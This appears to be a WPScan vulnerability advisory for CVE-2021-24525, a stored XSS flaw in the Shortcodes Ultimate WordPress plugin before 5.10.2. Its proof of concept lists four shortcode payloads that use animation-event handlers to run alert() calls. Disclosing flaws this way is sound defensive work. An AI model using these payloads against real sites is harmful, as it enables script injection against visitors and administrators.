logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Shortcodes Ultimate < 5.10.2 - Contributor+ Stored XSS

Description

The plugin allows users with Contributor roles to perform stored XSS via shortcode attributes. Note: the plugin is inconsistent in its handling of shortcode attributes; some do escape, most don't, and there are even some attributes that are insecure by design (like [su_button]'s onclick attribute).

Proof of Concept

[su_accordion class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)']
[su_animate duration='1s;animation-name:twentytwentyone-close-button-transition;' type='" onanimationend="alert(2)']
[su_audio width='1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(3)//' url="a"]
[su_box color='red;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(4)//']

Affects Plugins

shortcodes-ultimate

Fixed in version 5.10.2

References

CVE

CVE-2021-24525

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

7f5659bd-50c3-4725-95f4-cf88812acf1c

Timeline

Publicly Published

2021-08-23 (about 5 months ago)

Added

2021-08-23 (about 5 months ago)

Last Updated

2021-08-23 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin